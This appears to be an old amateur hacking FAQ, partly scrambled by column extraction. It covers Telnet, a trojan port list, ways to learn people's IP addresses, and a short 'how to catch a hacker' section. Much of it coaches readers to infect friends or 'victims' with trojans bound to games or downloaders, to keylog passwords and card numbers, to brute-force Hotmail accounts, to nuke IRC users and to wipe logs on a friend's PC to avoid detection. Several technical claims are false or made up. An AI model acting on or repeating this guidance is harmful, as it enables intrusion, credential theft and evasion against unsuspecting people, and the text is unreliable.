hostname part and all that, just what does Term-
Type mean?
Ok people, so many people have asked me this
I'm ready to start getting an auto-flame response
on my e-mail box LoL. Anyway, here goes:
Term Type means Terminal Type. It is the
version of the Telnet Terminal that the host or
server is running. You have to specify this,
Telnet is not hacker-friendly.
In Windows 98/95/ME you are not running a
DOS-Based version of Telnet. You get a client
program, somewhat considered shit for me. I like
the DOS based one and frankly, I find it a lot
easier to use.
I can't connect to the host!
Well, the host either doesn't exist, does not
support Telnet Packets or Connections, or is
currently restricting proxy access or usage from
your addy or all addresses.
I went further than you because I thought I knew
what I was doing! I got this message saying my
hacking attempt was logged! Am I going to go to
jail!?!?!
Don’t worry, as long as its not with the extension
.log or .hlog or .hacklog you're fine, as 95
percent of these messages are BS and lies.
IF THEY'RE LIES, how come they knew I was
hacking them?
They don't. They simply search for incoming
connections not recognized by the server. If the
SysAdmins didn't modify the message, you
would have gotten this:
"Error 229292: Data not recognized 8191:
Distinct Remote Service Lost or Corrupt."
They just modified it. Breath in, breath out,
relax.
My dad or mom found out I was hacking, and
my dad's an expert on computers! He made it so
I can't view anything on AOL. What the hell's
going on! Give me a trick to evade this!
Sure thing. Connect to AOL, ping the site you're
trying to view, and type in the IP address. You
will get to the homepage, but this isn't that good
a trick because you can't ping sub-addys and
you're going to get text for the sub-urls. This
might or might now work.
I was screwing around with my friends
computer. I think I left my information
somewhere, but where?
Usually, you have a critical system log. If you
delete a system file (which unless you're 133t
you'd NEVER EVER do) the computer's going
to boot and give you a log of what happened
before the deletion of the file so you know what
went wrong. If you did happen to delete it, it will
list something like "deletion from x.x.x.x. (your
IP)". If it does, damn, you're busted. But there
are ways of getting rid of this "hacker-knock
out". First off, get a WAN-Controller, or any sort
of program that lets you input screen or
Hardware input by the output. This means you
can control their computer with yours. But you
can't boot this computer, because it will break
the connection.
Access the log files usually in system or
system32 (both system files located in
C:/Windows or C:/). There, you will see
encrypted sh1t. CTRL+A will select it all and
delete it all. If you do delete this file, (after you
do), try recovering the system file. WHATEVER
YOU DO DON'T DO A SYSTEM RESTORE,
YOU HAVE BEEN WARNED.
Some hacker has my IP and hacks it every time I
log on. It's static, which means it doesn't change.
How do I make him stop? I don't know what his
IP is, either!
Go to start, run, "netstat -a". Hacking is almost
equivalent to connecting, if he's hacking you
your connected to him and he's connected to you.
Netstat -a is a command that allows you to see
all your connections to hosts and servers,
associated with TCP/IP. If you see a hostname
that you don't recognize, log it. In fact, click
Print Screen, go to paint, CTRL+V, Crop the
image of the DOS window for Netstat, and save
it. That should be quite easy.
How To Catch A
Hacker
Tip 1: Hackers cover their tracks. Experienced
hackers cover them more thorougly, but amateur
hackers sometimes leave things behind. Don't
expect them to leave any really big evidence
behind; expect more of little things here and
there you might find surprising. For example, if
you're writing a term paper and a black hat
hacker accidently saved it when he took a
paragraph out- that's suspicious. Where did that
paragraph go? Well, for one thing, now you
know he was in that area. Check the folders
surrounding the file- you might find something.
Tip 2: Decipher between the type of hackers that
are attacking you. Experienced hackers will have
a more in depth look around when they penetrate
your system. They won't touch much because
they know that that won't add too much to their
knowledge. But if you know a hacker's been in,
and some files are messed with, and you have a
log of someone guessing passwords to a file or
something of that sort, its probably some newbie
who's just starting out. These are the easiest
hackers to catch. They usually get so caught up
in thoughts like "I'm in!" that they forget the
basics, such as work behind a proxy.
My friend was setting up a webserver once. His
first time too, and he wasn't to anxious to set up
some good software to protect against hackers
and viruses. He didn't put up one IDS, and before
you know it, the obvious happened. But this
time, a newbie had struck. The nice log files
showed, bluntly across the screen, multiple
instances of a foreign IP address that stood out.
Some stupid newbie had tried to login as "uucp"
on my friend's XP computer, with a password of
"uucp." Well, that's great, but he also had tried
the same user/pass combination three times,
enough to get himself logged nicely. Even a
semi-brainless user with some form of
neurological system knows that uucp isn't a
default XP account. Again, excitement toiled this
hacker's brain, and maybe if he hadn't done that,
along with a few other stupid things, he wouldn't
have gotten caught. What other things did he do?
Well, lets see. He openned 35 instances of MS-
DOS. He tried to clean the printer's heads, and he
edited a .gif in notepad. Then he uninstalled a
few programs and installed some html editor,
and replaced four files with the words "14P."
He might as well have posted his phone number.
In a few days, we had tracked him down to a
suburban town in Ohio. We let him go, not
pressing any charges, because he had done
nothing really damaging and had provided me
with an example of a moron for this guide.
Tip 3: Don't go crazy if you lose data. Chances
are, if it was that important, you would have
backed it up anyway. Most hackers nowadays
wish they were back in 1989 when they could
use a Black Box and having a Rainbow Book
actually meant something. Most hackers aren't
blackhat, they are whitehat, and some even
greyhat. But in the end, most hackers that are in
systems aren't satisfied by looking around. From
past experiences, I have concluded that many
hackers like to remember where've they been.
So, what do they do? They either press delete
here and there, or copy some files onto their
systems. Stupid hackers (yes, there are plenty of
stupid hackers) send files to e-mail addresses.
Some free email companies will give you the IP
of a certain e-mail address's user if you can
prove that user has been notoriously hacking
you. But most of the time, by the time you get
the e-mail addy it's been unused for weeks if not
months or years, and services like hotmail have
already deleted it.
Tip 4: Save information! Any information that
you get from a log file (proxy server IP, things
like "14P", e-mail addresses that things were sent
to, etc.) should be saved to a floppy disk (they're
not floppy anymore, I wish I could get out of the
habit of calling them that) incase there's a next
time. If you get another attack, from the same
proxy, or with similar e-mail addresses (e.g: one
says Blackjack 123@something.whatever and
the other says
Black_jack_45@something.znn.com) you can
make an assumption that these hackers are the
same people. In that case, it would probably be
worth the effort to resolve the IP using the proxy
and do a traceroute. Pressing charges is
recommended if this is a repeat offender.
Tip 5: Don't be stupid. If you've been hacked,
take security to the next level. Hackers do talk
about people they've hacked and they do post IPs
and e-mail addresses. Proof? Take a look at
Defcon Conventions. I've never gone to one, but
I've seen the photos. The "Wall of Shame"-type
of boards I've seen have IPs and e-mail addresses
written all over them in fat red, dry-erase ink.
Don't be the one to go searching the Defcon
website and find your e-mail address posted on
the Wall of Shame board!
Tip 6: Don't rely on luck. Chances are, sometime
or another, you're going to be targeted for an
attack. Here you can rely on luck. Maybe they'll
forget? Maybe they don't know how to do it? If
you think this way, a surprise is going to hit your
face very hard. Another way you could stupidly
rely on luck is by saying this: It's probably just a
whitehat. On the contrary, my friend, it's
probably just a blackhat. A blackhat with
knowledge stored in his head, ready to be used as
an ax. It's your data. You take the chance.
- Scan for an open
port - infected
trojan user -
Scanning ranges of networks
Well , you can try lets say Trojan Hunter from
the Ip scanners section to scan for a range of IP
addresses lets say 212.212.*.* , where * is all the
numbers in network or 212.212.212.* for a
smaller more specified scann i will be soon
adding the IP bible so you can find out which IP
addresses apear in lets say asia , or europe , or
greece , or a city , or the village where i am from
and scan all the online users from that place , i
promise i will add it as soon i find it again(lost it
in a drive format while playing around with
some viruses)
Scanning mIRC chat channels
Why scan irc channels? Just because there are
some really big irc channels with 1000+ or 500+
users and thats a nice IP recourse of ready to
scan IP addresses i strongly recommend you to
download IRC Scanner v1.0 by RG its a great
tool to gather all the channels ursers IP addresses
and scans them in seconds at the port you choose
in the beggining of the scan
 TCP 1008 AutoSpy.100
- Trojan ports list - TCP 1010 DerSpaeher.200
TCP 1015 Doly.150
TCP 1111 TPort.100
TCP 1130 Noknok.800, Noknok.820
TCP 1207 SoftWAR.100
TCP 1243 Subseven.100, SubSeven.110,
SubSeven.180, SubSeven.190, Subseven.200
TCP 1245 VoodooDoll.006
TCP 1269 Matrix.130
TCP 1480 RemoteHack.130
TCP 1568 RemoteHack.100, RemoteHack.110
TCP 1600 DirectConnection.100
TCP 1601 DirectConnection.100
TCP 1602 DirectConnection.100
TCP 1634 NetCrack.100
TCP 1784 Snid.120, Snid.212
TCP 1 Breach.2001, SocketsDeTroie.230,
TCP 1999 TransmissionScout.100,
SocketsDeTroie.250
TransmissionScout.110
TCP 28 Amanda.200
TCP 2000 ATrojan.200, InsaneNetwork.400
TCP 31 MastersParadise.920
TCP 2001 DIRT.220, TrojanCow.100
TCP 68 Subseven.100
TCP 2003 TransmissionScout.100,
TCP 142 NetTaxi.180
TransmissionScout.110
TCP 146 Infector.141, Intruder.100, Intruder.100
TCP 2023 RipperPro.100
TCP 171 ATrojan.200
TCP 2040 InfernoUploader.100
TCP 285 WCTrojan.100
TCP 2115 Bugs.100
TCP 286 WCTrojan.100
TCP 2140 DeepThroat.100, DeepThroat.200,
TCP 334 Backage.310
DeepThroat.310
TCP 370 NeuroticKat.120, NeuroticKat.130
TCP 2332 SilentSpy.202
TCP 413 Coma.109
TCP 2589 Dagger.140
TCP 420 Breach.450
TCP 2600 DigitalRootbeer.100
TCP 555 Id2001.100, PhaseZero.100,
TCP 2989 Rat.200
StealthSpy.100
TCP 3128 MastersParadise.970
TCP 623 Rtb666.160
TCP 3129 MastersParadise.920,
TCP 660 Zaratustra.100
MastersParadise.970
TCP 661 Noknok.800, Noknok.820
TCP 3150 DeepThroat.100, DeepThroat.200,
TCP 666 BackConstruction.210,
DeepThroat.310, MiniBacklash.110
BackConstruction.250, Bla.100, Bla.200,
TCP 3215 BlackStar.100, Ghost.230
Bla.400, Bla.503, Cain.150, Dimbus.100,
TCP 3333 Daodan.123
Noknok.820, Ripper.100, SatansBackdoor.100,
TCP 3410 OptixPro.100, OptixPro.110
SatansBackdoor.101, SatansBackdoor.102,
TCP 3456 Force.155, TerrorTrojan.100
Unicorn.100, Unicorn.101, Unicorn.110
TCP 3505 AutoSpy.130, AutoSpy.140
TCP 667 SniperNet.210, Snipernet.220
TCP 3586 Snid.120, Snid.212
TCP 668 Unicorn.101, Unicorn.110
TCP 3700 PortalOfDoom.100
TCP 680 Rtb666.160
TCP 3723 Mantis.100
TCP 777 Tiny.100, Undetected.230,
TCP 3800 Eclypse.100
Undetected.300, Undetected.310,
TCP 3996 RemoteAnything.364
Undetected.320, Undetected.330,
TCP 4000 SkyDance.220, SkyDance.229
Undetected.331, Undetected.332
TCP 4201 Wartrojan.160, Wartrojan.200
TCP 785 NetworkTerrorist.100
TCP 4225 SilentSpy.202
TCP 800 NeuroticKitten.010
TCP 4321 Bobo.100
TCP 831 NeuroticKat.100, NeuroticKat.120,
TCP 4444 AlexTrojan.200, Crackdown.100
NeuroticKat.130
TCP 4488 EventHorizon.100
TCP 901 NetDevil.130, NetDevil.140
TCP 4523 Celine.100
TCP 1000 DerSpaeher.200
TCP 4545 InternalRevise.100,
TCP 1001 Silencer.100
RemoteRevise.150
TCP 4567 FileNail.100 TCP 6660 LameSpy.095
TCP 4666 Mneah.100 TCP 6666 LameRemote.100,
TCP 4950 ICQTrojan.100 ProjectMayhem.100
TCP 5005 Aladino.060 TCP 6669 Vampire.100
TCP 5025 Keylogger.WMRemote.100 TCP 6670 DeepThroat.200, DeepThroat.210
TCP 5031 NetMetro.104 TCP 6671 DeepThroat.310
TCP 5032 NetMetro.104 TCP 6699 HostControl.101
TCP 5033 NetMetro.104 TCP 6711 DeepThroat.300, Noknok.820,
TCP 5050 RoxRat.100 SubSeven.180, SubSeven.190
TCP 5151 OptixLite.020, OptixLite.030, TCP 6712 Subseven.100
OptixLite.040 TCP 6713 Subseven.100
TCP 5190 MBomber.100 TCP 6767 NTRC.120
TCP 5277 WinShell.400 TCP 6776 SubSeven.180, SubSeven.190,
TCP 5343 WCRat.100 Subseven.200
TCP 5400 BackConstruction.120, TCP 6789 Doly.200
BackConstruction.150, BladeRunner.080, TCP 6796 SubSeven.214
DeepThroat.300 TCP 6912 ShitHeep.100
TCP 5401 BackConstruction.120, TCP 6939 Indoctrination.100
BackConstruction.150, BackConstruction.210, TCP 6953 Lithium.100
BackConstruction.250, BladeRunner.080, TCP 6969 2000Cracks.100, Bigorna.100,
DeepThroat.300, Mneah.100 Danton.110, Danton.210, Danton.220,
TCP 5402 BackConstruction.210, Danton.310, Danton.320, Danton.330,
BackConstruction.250, BladeRunner.080, GateCrasher.110, NetController.108, Sparta.110,
DeepThroat.300, Mneah.100 VagrNocker.120
TCP 5534 TheFlu.100 TCP 6970 Danton.330
TCP 5550 XTCP.200, XTCP.201 TCP 7001 Freak88.100
TCP 5555 Noxcape.100, Noxcape.200 TCP 7119 Massaker.100
TCP 5695 Assassin.100 TCP 7200 Massaker.110
TCP 5714 WinCrash.100 TCP 7300 Coced.221
TCP 5741 WinCrash.100 TCP 7301 Coced.221
TCP 5742 WinCrash.103 TCP 7306 NetSpy.200, NetSpy.200
TCP 5802 Y3KRat.160 TCP 7410 Phoenix.190, Phoenix.200
TCP 5810 Y3KRat.160 TCP 7511 Genue.100
TCP 5838 Y3KRat.170 TCP 7609 Snid.120, Snid.212
TCP 5858 Y3KRat.110, Y3KRat.120, TCP 7614 Wollf.130
Y3KRat.140 TCP 7648 BlackStar.100, Ghost.230
TCP 5880 Y3KRat.140 TCP 7788 Last.2000, Matrix.200
TCP 5881 Y3KRat.110, Y3KRat.120, TCP 7826 MiniOblivion.010, Oblivion.010
Y3KRat.140 TCP 7887 SmallFun.110
TCP 5882 Y3KRat.100, Y3KRat.110, TCP 7891 Revenger.100
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 7979 VagrNocker.200
TCP 5883 Y3KRat.110, Y3KRat.140 TCP 7997 VagrNocker.200
TCP 5884 Y3KRat.140, Y3KRat.150 TCP 8000 XConsole.100
TCP 5885 Y3KRat.110, Y3KRat.120, TCP 8011 Way.240
Y3KRat.140 TCP 8012 Ptakks.215, Ptakks.217
TCP 5886 Y3KRat.120, Y3KRat.140 TCP 8110 LoseLove.100
TCP 5887 Y3KRat.110, Y3KRat.120, TCP 8111 LoseLove.100
Y3KRat.140 TCP 8301 LoseLove.100
TCP 5888 Y3KRat.100, Y3KRat.110, TCP 8302 LoseLove.100
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 8372 NetBoy.100
TCP 5889 Y3KRat.100, Y3KRat.110, TCP 8720 Connection.130
Y3KRat.120, Y3KRat.140, Y3KRat.150 TCP 8734 AutoSpy.110
TCP 5890 Y3KRat.140 TCP 8811 Force.155
TCP 6400 Thething.100, Thething.150 TCP 8899 Last.2000
TCP 6556 AutoSpy.120, AutoSpy.122 TCP 9000 Aristotles.100
TCP 6655 Aqua.020 TCP 9301 LoseLove.100
TCP 9400 InCommand.100, InCommand.110, Bionet.402
InCommand.120, InCommand.130, TCP 12389 KheSanh.210
InCommand.140, InCommand.150, TCP 12478 Bionet.210
InCommand.153, InCommand.160, TCP 12623 Buttman.090, Buttman.100
InCommand.167, InCommand.170 TCP 12624 Buttman.090, Buttman.100
TCP 9401 InCommand.100, InCommand.110, TCP 12625 Buttman.100
InCommand.170 TCP 12904 Akropolis.100, Rocks.100
TCP 9402 InCommand.100, InCommand.110 TCP 13473 Chupacabra.100
TCP 9561 CRatPro.110 TCP 13753 AFTP.010
TCP 9563 CRatPro.110 TCP 14100 Eurosol.100
TCP 9580 TheefLE.100 TCP 14194 CyberSpy.840
TCP 9696 Danton.210, Ghost.230 TCP 14286 HellDriver.100
TCP 9697 Danton.320, Danton.330, Ghost.230 TCP 14500 PCInvader.050, PCInvader.060,
TCP 9870 R3C.100 PCInvader.070
TCP 9872 PortalOfDoom.100 TCP 14501 PCInvader.060, PCInvader.070
TCP 9873 PortalOfDoom.100 TCP 14502 PCInvader.050, PCInvader.060,
TCP 9874 PortalOfDoom.100 PCInvader.070
TCP 9875 PortalOfDoom.100 TCP 14503 PCInvader.050, PCInvader.060,
TCP 9876 Rux.100, SheepGoat.100 PCInvader.070
TCP 9877 SmallBigBrother.020 TCP 14504 PCInvader.050, PCInvader.060
TCP 9878 SmallBigBrother.020, TCP 15092 HostControl.100, HostControl.260
TransmissionScout.100, TransmissionScout.110, TCP 15382 SubZero.100
TransmissionScout.120 TCP 15432 Cyn.210
TCP 9879 SmallBigBrother.020 TCP 15555 ICMIBC.100
TCP 9999 ForcedEntry.100, Infra.100, TCP 16322 LastDoor.100
Prayer.120, Prayer.130, TakeOver.200, TCP 16484 MoSucker.110
TakeOver.300 TCP 16661 Dfch.010
TCP 10001 DTr.130, DTr.140 TCP 16969 Progenic.100
TCP 10013 Amanda.200 TCP 16982 AcidShiver.100
TCP 10067 PortalOfDoom.100 TCP 17300 Kuang.200
TCP 10100 Gift.240 TCP 17499 CrazzyNet.370, CrazzyNet.375,
TCP 10101 NewSilencer.100 CrazzyNet.521
TCP 10167 PortalOfDoom.100 TCP 17500 CrazzyNet.370, CrazzyNet.375,
TCP 10528 HostControl.100, HostControl.260 CrazzyNet.521
TCP 10607 Coma.109 TCP 17569 Infector.141, Infector.160,
TCP 10666 Ambush.100 Infector.170, Infector.180, Infector.190,
TCP 11011 Amanda.200 Infector.200, Intruder.100, Intruder.100
TCP 11050 HostControl.101 TCP 17593 AudioDoor.120
TCP 11051 HostControl.100, HostControl.260 TCP 19191 BlueFire.035, BlueFire.041
TCP 11223 AntiNuke.100, Progenic.100, TCP 19604 Metal.270
Progenic.110 TCP 19605 Metal.270
TCP 11225 Cyn.100, Cyn.103, Cyn.120 TCP 19991 Dfch.010
TCP 11306 Noknok.800, Noknok.820 TCP 20000 Millenium.100
TCP 11831 Katux.200, Latinus.140, Latinus.150, TCP 20001 Millenium.100, PshychoFiles.180
Pest.100, Pest.400 TCP 20002 AcidKor.100, PshychoFiles.180
TCP 11991 PitfallSurprise.100 TCP 20005 MoSucker.200, MoSucker.210,
TCP 12043 Frenzy.2000 MoSucker.220
TCP 12345 Fade.100, Netbus.160, Netbus.170, TCP 21212 Schwindler.182
VagrNocker.400 TCP 21554 Exploiter.100, Exploiter.110,
TCP 12346 Netbus.160, Netbus.170 Girlfriend.130, GirlFriend.135
TCP 12348 Bionet.210, Bionet.261, Bionet.280, TCP 21579 Breach.2001
Bionet.302, Bionet.305, Bionet.311, Bionet.313, TCP 21584 Breach.2001
Bionet.316, Bionet.317 TCP 21684 Intruse.134
TCP 12349 Bionet.084, Bionet.261, Bionet.280, TCP 22068 AcidShiver.110
Bionet.302, Bionet.305, Bionet.311, Bionet.313, TCP 22115 Cyn.120
Bionet.314, Bionet.316, Bionet.317, Bionet.401, TCP 22222 Prosiak.047, Ruler.141, Rux.300,
Rux.400, Rux.500, Rux.600 NetSphere.131
TCP 22223 Rux.400, Rux.500, Rux.600 TCP 30103 NetSphere.131
TCP 22456 Bla.200, Bla.503 TCP 30947 Intruse.134
TCP 22457 AcidShiver.120, Bla.200, Bla.503 TCP 31320 LittleWitch.400, LittleWitch.420
TCP 22784 Intruzzo.110 TCP 31337 BackOrifice.120, Khaled.100,
TCP 22845 Breach.450 OPC.200
TCP 22847 Breach.450 TCP 31415 Lithium.101
TCP 23005 Infinaeon.110, NetTrash.100, TCP 31416 Lithium.100, Lithium.101
Oxon.110, WinRat.100 TCP 31557 Xanadu.110
TCP 23006 Infinaeon.110, NetTrash.100, TCP 31631 CleptoManicos.100
Oxon.110, WinRat.100 TCP 31745 Buschtrommel.100,
TCP 23032 Amanda.200 Buschtrommel.122
TCP 23432 Asylum.010, Asylum.012, TCP 31785 Hack'a'Tack.100, Hack'a'Tack.112
Asylum.013, Asylum.014, MiniAsylum.110 TCP 31787 Hack'a'Tack.100, Hack'a'Tack.112
TCP 23456 EvilFTP.100, VagrNocker.400 TCP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 23476 DonaldDick.153, DonaldDick.154, TCP 31791 Hack'a'Tack.100, Hack'a'Tack.112
DonaldDick.155 TCP 31887 BDDT.100
TCP 23477 DonaldDick.153 TCP 31889 BDDT.100
TCP 24000 Infector.170 TCP 32100 ProjectNext.053
TCP 24307 Wildek.020 TCP 32418 AcidBattery.100
TCP 25386 MoonPie.220 TCP 32791 Akropolis.100, Rocks.100
TCP 25486 MoonPie.220 TCP 33291 RemoteHak.001
TCP 25555 FreddyK.100, FreddyK.200 TCP 33333 Blackharaz.100, Prosiak.047,
TCP 25556 FreddyK.100 SubSeven.214
TCP 25685 MoonPie.010, MoonPie.012, TCP 33577 SonOfPsychward.020
MoonPie.130, MoonPie.220, MoonPie.240, TCP 34324 TelnetServer.100
MoonPie.400 TCP 34763 Infector.180, Infector.190,
TCP 25686 MoonPie.135, MoonPie.200, Infector.200
MoonPie.400 TCP 35000 Infector.190, Infector.200
TCP 25982 MoonPie.135, MoonPie.200 TCP 35600 Subsari.140
TCP 26274 Delta.050 TCP 36794 BugBear.100
TCP 27160 MoonPie.135, MoonPie.200 TCP 37237 Mantis.020
TCP 27184 Alvgus.100, Alvgus.800 TCP 37651 YAT.210
TCP 27374 Muerte.110, Subseven.210, TCP 37653 YAT.310
SubSeven.213 TCP 40308 Subsari.140
TCP 28429 Hack'a'Tack.2000 TCP 40412 TheSpy.100
TCP 28430 Hack'a'Tack.2000 TCP 40421 MastersParadise.970
TCP 28431 Hack'a'Tack.2000 TCP 40422 MastersParadise.970
TCP 28432 Hack'a'Tack.2000 TCP 40999 DiemsMutter.110, DiemsMutter.140
TCP 28433 Hack'a'Tack.2000 TCP 41626 Shah.100
TCP 28434 Hack'a'Tack.2000 TCP 44444 Prosiak.070
TCP 28435 Hack'a'Tack.2000 TCP 45673 Akropolis.100, Rocks.100
TCP 28436 Hack'a'Tack.2000 TCP 47262 Delta.050
TCP 29559 DuckToy.100, DuckToy.101, TCP 48006 Fragglerock.200
Katux.200, Latinus.140, Latinus.150, Pest.100, TCP 49683 HolzPferd.210
Pest.400 TCP 50000 Infector.180
TCP 29891 Unexplained.100 TCP 50130 Enterprise.100
TCP 30000 Infector.170 TCP 50766 Fore.100
TCP 30001 Error32.100 TCP 51234 Cyn.210
TCP 30003 LamersDeath.100 TCP 51966 Cafeini.080, Cafeini.110
TCP 30029 AOLTrojan.110 TCP 54321 PCInvader.010
TCP 30100 NetSphere.127, NetSphere.130, TCP 57341 NetRaider.100
NetSphere.131 TCP 57922 Bionet.084
TCP 30101 NetSphere.127, NetSphere.130, TCP 58008 Tron.100
NetSphere.131 TCP 58009 Tron.100
TCP 30102 NetSphere.127, NetSphere.130, TCP 59090 AcidReign.200
TCP 59211 DuckToy.100, DuckToy.101 UDP 28432 Hack'a'Tack.2000
TCP 59345 NewFuture.100 UDP 28433 Hack'a'Tack.2000
TCP 60000 DeepThroat.300, MiniBacklash.100, UDP 28434 Hack'a'Tack.2000
MiniBacklash.101, MiniBacklash.101 UDP 28435 Hack'a'Tack.2000
TCP 60411 Connection.100, Connection.130 UDP 28436 Hack'a'Tack.2000
TCP 60412 Connection.130 UDP 29891 Unexplained.100
TCP 60552 RoxRat.100 UDP 30103 NetSphere.131
TCP 63536 InsaneNetwork.500 UDP 31320 LittleWitch.400, LittleWitch.420
TCP 63878 AphexFTP.100 UDP 31337 BackOrifice.120, OPC.200
TCP 63879 AphexFTP.100 UDP 31416 Lithium.100, Lithium.101
TCP 64969 Lithium.100 UDP 31789 Hack'a'Tack.100, Hack'a'Tack.112
TCP 65000 Socket.100 UDP 31791 Hack'a'Tack.100, Hack'a'Tack.112
UDP 1 SocketsDeTroie.250 UDP 33333 Blackharaz.100
UDP 666 Bla.200, Bla.400, Bla.503, UDP 47262 Delta.050
Noknok.820 UDP 49683 HolzPferd.210
UDP 1130 Noknok.800, Noknok.820 UDP 60000 MiniBacklash.100
UDP 2140 DeepThroat.100, DeepThroat.200,
DeepThroat.310
UDP 2989 Rat.200
UDP 3128 MastersParadise.970
UDP 3129 MastersParadise.920,
- Scan for an open
MastersParadise.970
UDP 3150 DeepThroat.100, DeepThroat.200, port - infected
DeepThroat.310, MiniBacklash.110
UDP 3333 Daodan.123
UDP 3800 Eclypse.100
trojan user -
UDP 3996 RemoteAnything.364
UDP 4000 RemoteAnything.364
- Get an IP address
UDP 5555 Daodan.123
UDP 5881 Y3KRat.110, Y3KRat.140 -
UDP 5882 Y3KRat.100, Y3KRat.110,
Y3KRat.120, Y3KRat.140, Y3KRat.150
UDP 5883 Y3KRat.110, Y3KRat.140
UDP 5884 Y3KRat.140, Y3KRat.150
UDP 5885 Y3KRat.110, Y3KRat.120,
Y3KRat.140
UDP 5886 Y3KRat.120, Y3KRat.140
UDP 5887 Y3KRat.110, Y3KRat.120,
Y3KRat.140
UDP 5888 Y3KRat.100, Y3KRat.110,
Y3KRat.120, Y3KRat.150 A little hand for the newbies-lamers here.
UDP 6953 Lithium.100
UDP 8012 Ptakks.217 Find an msn messengers contact IP address
UDP 10067 PortalOfDoom.100 The only way i know to do that is to send to the
UDP 10167 PortalOfDoom.100 contact a file while he is online , send him/her a
UDP 10666 Ambush.100 photo or something else , doing that a peer-to-
UDP 11225 Cyn.100, Cyn.103, Cyn.120 peer connection opens while your friend gets the
UDP 11306 Noknok.800, Noknok.820 file/photo no matter what it is , make sure that
UDP 12389 KheSanh.210 you have a DOS Prompt open (located at:start >
UDP 12623 Buttman.090, Buttman.100 programs > MS-DOS Prompt) and type the
UDP 12625 Buttman.100 command: netstat while sending them the file
UDP 14100 Eurosol.100 and you will see a list in the DOS Prompt of all
UDP 23476 DonaldDick.155 the connections your computer has that time ,
UDP 26274 Delta.050 one of them must be your friend that is receiving
UDP 27184 Alvgus.100 the file.If i hear about an other easier way that
UDP 28431 Hack'a'Tack.2000
you get it without sending files be sure i will post
it here.
Find an IP though mIRC chat channels
There is the /dns nickname command in irc but
some people use proxies or shells and you cant
see their real address,how do you know if the
user uses a web-shell or a proxy? well... guess
that yourself while looking the ip you got from
the /dns nickname command , make sure you
check out IRC Scanner v1.0 by RG in our
programming section and in IP scanners section ,
its the best and fastest way to scan the users in
IRC channels.
Get your friends IP address by sending them
to your page
Build a simple site in geocities or anywhere else
, then go t http://www.stats4all.com and create
an account , they provide free website statistics ,
add their code to your site and tell your friend to
check out a cool page you just made , when he
visits the page his IP will be logged in
stats4all.com so after your friend visits your page
check out your stats in stats4all.com and you will
find the last 5 visitors at the left of the stats page
, your friends IP included.
- How a trojan
works in a few
words -
What the fuck is a trojan?
A Trojan is a Remote Admin Tool , there is a
server that runs invisible on the victim and the
client that you run on your computer to take
control of the victim ,you cant connect to the
victim if he hasnt run the file yet ,there are many
trojans around with different commands , layouts
, extras ect , the trojans usually include a server
builder that its safe to run on your computer you
can browse to the server.exe and edit some
options , like passwords or ports before sendin
it...
How it works
When the victim runs the server.exe the server
runs invisible on the victim ,he doesnt see
anything.The server keeps a port open lets say
27374 port and waits for a connection , some
servers of some trojans may have passwords in
that case the server is stand by for a connection
and a password , when you log into the victim
the server enables you to run many commands
by pressing buttons in your client ,the trojans
were made to run those commands faster by
pressing buttons.
Antiviruses
All the antiviruses like Mc Affee ,Norton ect will
identify like a virus and try to delete all the
trojan servers you plan to send to your victims ,
also all the trojan clients even the server editor
all the trojans are identified like viruses with all
their files so dont send me e-mails tellin me my
files are infected ! they are not infected , they are
the original viruses and you wont get any
troubles if you know what you are doin.
What to do with a trojan
Another question you keep askin me how to use
a trojan and what to do with it ...
You can play with it , open the cds and laugh
like stupid that you are , or redirect ports for
other purposes , enable keyloggers and get the
passwords , log on into their mails , who knows ,
you might key-log their gredit card numbers
...you can make them log in irc servers like bots
to see whos online and a lot more
- Some ways to
infect someone
with a virus or a
trojan -
Bind 2 exes (infect a game or any other .exe
with your virus/trojan)
A simple thing to do is bind a game with the
virus or trojan , lets say you have game.exe and
server.exe , there are some programs that will
add server.exe into game.exe , so when the
program connects those two files it gives you a
file.exe that will have both game and server in it
, send it to your friends and say its just a game ,
binder is the program you need to connect these
file and can be found in Trojans/Backdoors
section.
Send them a downloader
A downloader will automaticaly download AND
execute any file from the internet on the victims
computer as soon as they open the
downloader,here it goes:a downloader is 2-4 Kb
only! it can be added in a game.exe with the way
above,you have to upload your trojan/virus on a
server lets say geocities then you set up the
downloader to download and run this file,you
send the 4Kb file to the victim and as soon his
computer runs the file it starts downloading the
trojan/virus from geocities,the victim will see
nothin, the VIR SCANNERS CANT SEE IT
BUT they will detect the trojan/virus that it will
download.Downloader is what you are lookin for
and can be found in Trojans/Backdoors section.
victims will have the auto-coplete on so this will
wont work 100%)
Way #3 : MSN proggies
There are some MSN programs for that job (like
furax), you send to your friend/victim a file thats
12Kb and when they run it (ask them if they did
someway) you type a command in yours-theirs
chat window and it logs them off , when they log
in again the program will have the username and
the password , you type another command in the
chat MSN chat window again and the victim
sends you automaticaly (and invisible) the user
and the password.I guess Furax doesnt work now
but there are new versions that do the same job.

Infected webpage (.EML Bug) Way #4 :Brute Forcer

Another way is to build a webpage that contains Called brute forcers , some programs made to
a virus and infects the visitors with explorer send multiple password or user/password request
5.01-5.5 versions with any virus , i havent test it to a server, untill they get the right password for
yet and i am not sure if and how it works but i the username!This way might take long or might
have seen programs around that promt you to not work at all with Hotmail now but who
choose a trojan/virus then it decodes it and the it knows?There are other sites too
gives you the html that contains the virus the
problem is that it takes long time to decode it and
its better if your virus is 1-30Kb other ways it ll
take days to decode , as i said i havent test it yet
- Nuke people from
and i wont be able to write more or reply to any
emails askin for it.
IRC -
Best way (if you have access on the victims
pc)
Get a floppy disc and do the job :-) ...Ok
40% of the followin will work

- The only ways to

hack hotmail -
Well i guess that trying to hack hotmail is
impossible but if there is a way it should be one
of those:

Way #1 : Keylogger
A keylogger copies all the buttons pressed by the
victim in a .txt file,all you need is access to the
victims PC with a trojan or even go there with a
disc ,this is one of the best ways to get his user-
password and log in his account and many more
things!

Way #2 : Trojan Nuker Click 2.2

Some trojans have an option that gets the victims There is a nuker that will attemp to disconnect
passwords and usernames by pressin a button ,all the victim from the irc server, you perform the
you have to do is infect him ... (not all of the /whois nickname command to the victim and you
will get :
Nickname is username@ppp-208-138-219-
60.coqui.net * kyk
Nickname on @#Astynomia @#night_vision
#mp3 #hellas
Nickname using nini.irc.gr
Nickname End of /WHOIS list.
This is the /whois nickname command result , in
yellow you see the host of the victim and in
green you see the server that the victim uses ,
you need to add those in the nuker and press the
button , you cant see which port the victim uses
but the default is 6667 ,some networks mask
your real hostname so you wont be able to use
this nuker there, i v tested zone alarm and it
detects and stop this attack something that black
ICE just lets in and nuke you,i dont quarranty
you that will work , it worked for me 70% of
